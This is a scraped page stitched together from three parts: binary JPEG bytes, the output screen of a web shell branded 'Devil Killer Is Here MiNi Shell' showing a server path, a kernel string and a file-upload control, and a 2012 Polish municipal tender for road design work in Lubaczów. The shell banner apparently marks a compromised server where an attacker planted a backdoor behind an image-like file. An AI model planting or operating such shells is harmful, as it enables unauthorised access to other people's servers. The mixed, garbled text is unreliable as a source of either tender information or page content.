JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120319/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120319/85048-N-2012.html

<p class="kh_header"><b>Lubaczów: Wykonanie dokumentacji technicznej przebudowy i budowy dróg na terenie miasta Lubaczowa, drogi gminnej nr 104906R - ulicy Szpitalnej, drogi gminnej nr 104905R - ulicy Leśnej, drogi gminnej nr 104953R -  ulicy Rejtana oraz drogi gminnej nr 104955R - ulicy Podzamcze</b><br>
<b>Numer ogłoszenia: 85048 - 2012; data zamieszczenia: 19.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska w Lubaczowie (Burmistrz Miasta Lubaczowa) , ul. Rynek 26, 37-600 Lubaczów, woj. podkarpackie, tel. 016 6328010, faks 016 6321191.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lubaczow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie dokumentacji technicznej przebudowy i budowy dróg na terenie miasta Lubaczowa, drogi gminnej nr 104906R - ulicy Szpitalnej, drogi gminnej nr 104905R - ulicy Leśnej, drogi gminnej nr 104953R -  ulicy Rejtana oraz drogi gminnej nr 104955R - ulicy Podzamcze.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> A. Część 1.
A.1. Wykonanie projektu budowlano-wykonawczego: budowy drogi gminnej nr 104906R ulicy Szpitalnej od skrzyżowania z drogą gminną nr 104905R - ulicą Leśną do skrzyżowania z drogą gminną 104873R - ulicą dr H. Szymańskiego  oraz uzyskanie prawomocnej decyzji Zezwolenia na realizację inwestycji drogowej (ZRID). Projekt powinien uwzględnić:
a)  technologię nawierzchni z kostki brukowej wibroprasowanej na podbudowie tłuczniowej,
b) poszerzenie istniejącego pasa drogowego,
c) drogę na działce o numerze ewid. gruntu 1702 łączącej drogę gminną nr 104906R ul. Szpitalną z drogą powiatową PO1688R ul. Fryderyka Szopena 
d) odwodnienie nawierzchni jezdni z podłączeniem do istniejącej sieci kanalizacji deszczowej,
e) wykonanie oświetlenia ulicznego,
f) oznakowanie pionowe dla tego odcinka ulicy wraz z niezbędnymi uzgodnieniami.
g) elementy projektowane należy nawiązać sytuacyjnie względem osi jezdni w aktualnym kilometrażu drogi,
h) uwzględnić znajdujące się w pasie drogowym instalacje podziemne,
i) w przypadku występowania stałych punktów geodezyjnych projektant winien zaprojektować ich przestawienie w miejsce nie kolidujące z inwestycją i uwzględnić to w przedmiarze i kosztorysie.
A.2. Dokumentacja techniczna winna zawierać:
a) Projekt Wykonawczy wraz z decyzjami i uzgodnieniami (szczególnie operaty wodnoprawne i decyzje środowiskowe) jeżeli będą konieczne do uzyskania zgłoszenia robót lub pozwolenia na budowę, lub ZRID - 4 egz.
b) branżę drogową z ewentualnym projektem organizacji ruchu oraz inne branże - jeśli będą konieczne.
c) przedmiar robót i kosztorys inwestorski z zastosowaniem kodu CPV z podziałem na wstępnie ustalone odcinki węzłowe bądź elementy rozliczeniowe,
d) w kosztorysie i przedmiarze robót należy uwzględnić pozycje:
- sporządzenie inwentaryzacji powykonawczej,
- ewentualne przeniesienie punktów stałych geodezyjnych,
e) Szczegółowe Specyfikacje Techniczne wykonania i odbioru robót.

A.3. Po stronie Projektanta leży opracowanie podkładów geodezyjnych w zakresie niezbędnym do wykonania przedmiotu zamówienia (mapy do celów projektowych).
A.4. Przygotowanie niezbędnych materiałów i załączników do uzyskania decyzji zezwolenia na realizację inwestycji od organu administracji architektoniczno-budowlanej.
A.5. Sporządzenie wersji elektronicznej przedmiotu zamówienia w zakresie niezbędnym do ogłoszenia przetargu na wykonanie robót.
A.6. Informacje dodatkowe:
a) Wykonawca ma obowiązek uzgodnić z Zamawiającym technologię wykonania i materiały przewidziane do realizacji zadania objętego projektem budowlanym. 
b) W zakresie dokumentacji jest uzyskanie także między innymi:
- Decyzji oraz innych uzgodnień, które mogą wyniknąć w trakcie procesu projektowego, w tym związane z ewentualnym udostępnieniem kanału technologicznego. O w/w decyzje należy wystąpić dla i w imieniu inwestora. Stosowne pełnomocnictwo zostanie wydane Jednostce Projektującej.

B. Część 2.
B.1. Wykonanie projektu budowlano-wykonawczego: przebudowy drogi gminnej nr 104905R  ulicy Leśnej od skrzyżowania z drogą wojewódzką nr 866 ulicą A. Mickiewicza do skrzyżowania z drogą powiatowa nr PO1688R - ulicą Fryderyka Szopena w Lubaczowie wraz z budową zatok postojowych przy ogrodzeniu Szpitala   oraz uzyskanie prawomocnej decyzji o pozwoleniu na budowę lub zgłoszenia robót budowlanych lub zezwolenia na realizacje inwestycji drogowej (ZRID) do organu architektoniczno-budowlanego. Projekt powinien uwzględnić:
a)  technologię nawierzchni z kostki brukowej wibroprasowanej na podbudowie tłuczniowej,
b) budowę zatok postojowych wzdłuż ogrodzenia Szpitala,
c) wjazd na teren szpitala (przy kotłowni) zgodnie z załączonym projektem zagospodarowania działki nr 1672 w Lubaczowie,
d) odwodnienie nawierzchni jezdni z podłączeniem do istniejącej sieci kanalizacji deszczowej,
e) wykonanie oświetlenia ulicznego,
f) oznakowanie pionowe dla tego odcinka ulicy wraz z niezbędnymi uzgodnieniami.
g) elementy projektowane należy nawiązać sytuacyjnie względem osi jezdni w aktualnym kilometrażu drogi,
h) uwzględnić znajdujące się w pasie drogowym instalacje podziemne,
i) w przypadku występowania stałych punktów geodezyjnych projektant winien zaprojektować ich przestawienie w miejsce nie kolidujące z inwestycją i uwzględnić to w przedmiarze i kosztorysie.

B.2. Dokumentacja techniczna winna zawierać:
a) Projekt Wykonawczy wraz z decyzjami i uzgodnieniami (szczególnie operaty wodnoprawne i decyzje środowiskowe) jeżeli będą konieczne do uzyskania zgłoszenia robót lub pozwolenia na budowę, lub ZRID - 4 egz.
b) branżę drogową z ewentualnym projektem organizacji ruchu oraz inne branże - jeśli będą konieczne.
c) przedmiar robót i kosztorys inwestorski z zastosowaniem kodu CPV z podziałem na wstępnie ustalone odcinki węzłowe bądź elementy rozliczeniowe,
d) w kosztorysie i przedmiarze robót należy uwzględnić pozycje:
- sporządzenie inwentaryzacji powykonawczej,
- ewentualne przeniesienie punktów stałych geodezyjnych,
e) Szczegółowe Specyfikacje Techniczne wykonania i odbioru robót.

B.3. Po stronie Projektanta leży opracowanie podkładów geodezyjnych w zakresie niezbędnym do wykonania przedmiotu zamówienia (mapy do celów projektowych).
B.4. Przygotowanie niezbędnych materiałów i załączników do uzyskania decyzji decyzji o pozwoleniu na budowę lub zgłoszenia robót budowlanych lub zezwolenia na realizację inwestycji od organu administracji architektoniczno-budowlanej.
B.5. Sporządzenie wersji elektronicznej przedmiotu zamówienia w zakresie niezbędnym do ogłoszenia przetargu na wykonanie robót.
B.6. Informacje dodatkowe:
a) Wykonawca ma obowiązek uzgodnić z Zamawiającym technologię wykonania i materiały przewidziane do realizacji zadania objętego projektem budowlanym. 
b) W zakresie dokumentacji jest uzyskanie także między innymi:
- Decyzji oraz innych uzgodnień, które mogą wyniknąć w trakcie procesu projektowego, w tym związane z ewentualnym udostępnieniem kanału technologicznego. O w/w decyzje należy wystąpić dla   i w imieniu inwestora. Stosowne pełnomocnictwo zostanie wydane Jednostce Projektującej.

C. Część 3.
C.1. Wykonanie projektu budowlano-wykonawczego: przebudowy drogi gminnej nr 104953R -  ulicy Rejtana oraz przebudowy drogi gminnej nr 104955R - ulicy Podzamcze, a także uzyskanie skutecznego zgłoszenia na wykonanie robót budowlanych lub pozwolenia na budowę do organu architektoniczno-budowlanego. Projekt powinien uwzględnić:
a)  technologię nawierzchni z kostki brukowej wibroprasowanej na podbudowie tłuczniowej,
b) wymianę istniejącej sieci kanalizacji deszczowej,
c) elementy projektowane należy nawiązać sytuacyjnie względem osi jezdni w aktualnym kilometrażu drogi,
d) uwzględnić znajdujące się w pasie drogowym instalacje podziemne,
e) w przypadku występowania stałych punktów geodezyjnych projektant winien zaprojektować ich przestawienie w miejsce nie kolidujące z inwestycją i uwzględnić to w przedmiarze i kosztorysie.

C.2. Dokumentacja techniczna winna zawierać:
a) Projekt Wykonawczy wraz z decyzjami i uzgodnieniami (szczególnie operaty wodnoprawne i decyzje środowiskowe) jeżeli będą konieczne do uzyskania zgłoszenia robót lub pozwolenia na budowę lub ZRID - 4 egz.
b) branżę drogową z ewentualnym projektem organizacji ruchu oraz inne branże - jeśli będą konieczne.
c) przedmiar robót i kosztorys inwestorski z zastosowaniem kodu CPV z podziałem na wstępnie ustalone odcinki węzłowe bądź elementy rozliczeniowe,
d) w kosztorysie i przedmiarze robót należy uwzględnić pozycje:
- sporządzenie inwentaryzacji powykonawczej,
- ewentualne przeniesienie punktów stałych geodezyjnych,
e) Szczegółowe Specyfikacje Techniczne wykonania i odbioru robót.

C.3. Po stronie Projektanta leży opracowanie podkładów geodezyjnych w zakresie niezbędnym do wykonania przedmiotu zamówienia (mapy do celów projektowych).
C.4. Przygotowanie niezbędnych materiałów i załączników do uzyskania decyzji decyzji o pozwoleniu na budowę lub zgłoszenia robót budowlanych lub zezwolenia na realizację inwestycji od organu administracji architektoniczno-budowlanej.
C.5. Sporządzenie wersji elektronicznej przedmiotu zamówienia w zakresie niezbędnym do ogłoszenia przetargu na wykonanie robót.
C.6. Informacje dodatkowe:
a) Wykonawca ma obowiązek uzgodnić z Zamawiającym technologię wykonania i materiały przewidziane do realizacji zadania objętego projektem budowlanym. 
b) W zakresie dokumentacji jest uzyskanie także między innymi:
- Decyzji oraz innych uzgodnień, które mogą wyniknąć w trakcie procesu projektowego. O w/w decyzje należy wystąpić dla i w imieniu inwestora. Stosowne pełnomocnictwo zostanie wydane Jednostce Projektującej.

Projektant winien:
1. Przedłożyć domiary do jezdni i granicy sąsiadujących działek przyległych do pasa drogowego.
2. Sprawdzić czy wszystkie zjazdy i urządzenia drogowe występujące w terenie są ujęte na mapie sytuacyjnej (czy projekt przebudowy drogi ńie ograniczy dostępności do działek przyległych)
3. Zaznaczyć wszystkie kolizje z urządzeniami obcymi, a szczególnie hydranty, zasuwy, sączki, szafy telekomunikacyjne i energetyczne z wejściami, rodzaj konstrukcji słupów itp.
4. Zaznaczyć cieki wodne, wodnice i obszary wymagające odwodnienia będące w bezpośrednim sąsiedztwie inwestycji.
5. Projektowane urządzenia: dowiązać lokalizacyjne do istniejących i projektowanych zatok autobusowych, przystanków i przejść dla pieszych oraz innych urządzeń bezpieczeństwa mchu (np. bariery, poręcze, łańcuchy, schody, itp.) - według obowiązującego kilometraża.
6. W przypadku konieczności wejścia w grunty obce (poza pas drogowy) uzyskać zgody właścicieli na wejście w teren przed formalnym jego nabyciem (umowy cywilnoprawne), oraz przygotować kompletną dokumentację geodezyjną na ich wykup (podziały, operaty szacunkowe).
7. W terminie 2-ch tygodni przed złożeniem wniosku o zgłoszeniu robót/ na pozwolenie na budowę lub ZRID, projektant zorganizuje spotkanie w terenie okazując zamierzenia projektowe, a następnie dostarczy skompletowaną dokumentację.
8. Dokonać skutecznego zgłoszenia o zamiarze rozpoczęcia robót do organu architektoniczno-budowlanego, lub uzyskać pozwolenie na budowę decyzji zezwolenia na realizację inwestycji od organu administracji architektoniczno-budowlanej, po uprzednim uzyskaniu pełnomocnictwa oraz oświadczenia o prawie do dysponowania gruntem na cele budowlane.
9. Dołączyć klauzulę kompletności opracowania.
10.Niezgodności dokumentacji ze stanem faktycznym w terenie, wady ukryte i usterki w dokumentacji zaistniałe po okresie przekazania jej do Urzędu Miejskiego w Lubaczowie zostaną usunięte przez Projektanta staraniem zlecającego.
11.Projektant zobowiązany jest do usunięcia wad dokumentacji na własny koszt.

Dokumentację techniczną należy opracować:
- zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 02.09.2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznej wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego Dz.U. Z dnia 16.09.2004 r.,
na podstawie:
- ustawy Prawo Budowlane z dnia 7 lipca 1994 z późniejszymi zmianami,
- ustawy Prawo Ochrony Środowiska z dnia 27 kwietnia 2001 z późn. zmianami, 
- ustawy Prawo Wodne z dnia 18 lipca 2001 z późniejszymi zmianami, 
- ustawy o drogach publicznych z dnia 21 marca 1985 roku z późn. zmianami, 
- ustawy z dnia 27 marca 2003 roku o planowaniu i zagospodarowaniu przestrzennym z późniejszymi zmianami
- ustawy o gospodarce nieruchomościami z dnia 21 sierpnia 1997 roku z późniejszymi zmianami,
- ustawy o ochronie gruntów rolnych i leśnych z dnia 3 lutego 1995 roku z późniejszymi zmianami,
- ustawy o lasach z dnia 28 września 1991 roku z późniejszymi zmianami,
- ustawy o gospodarowaniu nieruchomościami rolnymi Skarbu Państwa z dnia 19 października 1991 roku z późniejszymi zmianami,
- ustawa Prawo o ruchu drogowym z dnia 20 czerwca 1997 roku z późn. Zmian.
- ustawa z dnia 25 lipca 2008 r. o zmianie ustawy o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych oraz o zmianie niektórych innych ustaw (Dz. U. z dnia 26 sierpnia 2008 r.)
- ustawa z dnia 3 października 2008 r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko(Dz. U. z dnia 7 listopada 2008 r.)
oraz zgodnie z Rozporządzeniami:
- Ministra Transportu i Gospodarki Morskiej z dnia 2 marca 1999 roku w sprawie warunków technicznych, jakim powinny odpowiadać drogi publiczne i ich usytuowanie Dz. U. z 14.05.1999r,
- Ministra Infrastruktury z dnia 23 września 2003 w sprawie szczegółowych warunków zarządzania ruchem na drogach oraz wykonania nadzoru nad tym zarządzaniem Dz. U. z l4X. 2003 r,
- Ministra Infrastruktury oraz Spraw Wewnętrznych i Administracji z dnia 31 lipiec 2002 roku w sprawie znaków i sygnałów na drogach Dz. U. z 23 .XII.2003r, -Ministra Transportu i Gospodarki Morskiej z dnia 30 maja 2000 roku w sprawie warunków technicznych, jakim powinny odpowiadać drogowe obiekty inżynierskie i ich usytuowanie Dz. U. z 30.05.2006,
- Ministra Gospodarki Przestrzennej i Budownictwa z dnia 21.02 1995r w sprawie
rodzaju i zakresu opracowań geodezyjno-kartograficznych oraz czynności geodezyjnych obowiązujących w budownictwie. Dz.U.95.25.133
- Ministra Spraw Wewnętrznych i Administracji z dnia 24.09.1988r. w sprawie ustalenia geotechnicznych warunków posadowienia obiektów budowlanych Dz.U.Nrl26poz839
- Ministra Infrastruktury z dnia 03.07.2003 r. w sprawie szczegółowego zakresu i formy projektu budowlanego, Dz. U. 120/03, poz. 1133.
- Ministra Gospodarki Przestrzennej i Budownictwa z dnia 21.02 1995 r.  w sprawie rodzaju i zakresu opracowań geodezyjno-kartograficznych oraz czynności geodezyjnych obowiązujących w budownictwie. Dz.U.95.25.133
- wszystkie pozostałe, obowiązujące ustawy i rozporządzenia ministerialne dotyczące warunków technicznych jakim powinny odpowiadać drogi publiczne
Przy kalkulacji ceny ofertowej należy uwzględnić wszystkie koszty niezbędne do należytego wykonania przedmiotu zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8, 71.24.00.00-2, 71.24.20.00-6, 71.30.00.00-1, 71.32.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania
- Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień.
Opis sposobu dokonywania oceny spełniania tego warunku:
Zamawiający dokona oceny spełnienia warunków udziału w postępowaniu poprzez zweryfikowanie wymaganych dokumentów,  metodą spełnia - nie spełnia: 
- Oświadczenie, że Wykonawca spełnia warunki określone w art. 22 ust. 1 , potwierdzających prawo do ubiegania się o przedmiotowe zamówienie publiczne</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli wykonawca wykaże, że w ciągu ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, wykonał co najmniej jednej lub dwóch usług, odpowiadających swoim rodzajem przedmiotowi zamówienia dotyczących projektowania dróg o łącznej długości co najmniej 500 mb i o łącznej wartości nie mniejszej niż 40000,00 zł brutto, potwierdzone referencjami - dokumentami, że usługi te zostały wykonane należycie (referencje muszą potwierdzać zakres projektu). 
Opis sposobu dokonywania oceny spełniania tego warunku:
Zamawiający dokona oceny spełnienia warunków udziału w postępowaniu poprzez zweryfikowanie wymaganych dokumentów,  metodą spełnia - nie spełnia: 
-Wykaz wykonanych usług w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania tego warunku:
Zamawiający dokona oceny spełnienia warunków udziału w postępowaniu poprzez zweryfikowanie wymaganych dokumentów,  metodą spełnia - nie spełnia: 
- Oświadczenie, że Wykonawca spełnia warunki określone w art. 22 ust. 1, potwierdzających prawo do ubiegania się o przedmiotowe zamówienie publiczne.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Warunek ten zostanie spełniony, jeżeli wykonawca wykaże, że dysponuje osobami  o wymaganych kwalifikacjach i doświadczeniu.
Opis sposobu dokonywania oceny spełniania tego warunku:
Zamawiający dokona oceny spełnienia warunków udziału w postępowaniu poprzez zweryfikowanie wymaganych dokumentów,  metodą spełnia - nie spełnia: 
- Oświadczenie o dysponowaniu co najmniej jedną osobą lub osobami posiadającymi uprawnienia do wykonywania samodzielnych funkcji projektanta bez ograniczeń w specjalnościach: drogowej z aktualną przynależnością do Polskiej Izby Inżynierów Budownictwa - wraz  z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania tego warunku
Zamawiający dokona oceny spełnienia warunków udziału w postępowaniu poprzez zweryfikowanie wymaganych dokumentów,  metodą spełnia - nie spełnia: 
- Oświadczenie, że Wykonawca spełnia warunki określone w art. 22 ust. 1, potwierdzających prawo do ubiegania się o przedmiotowe zamówienie publiczne.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
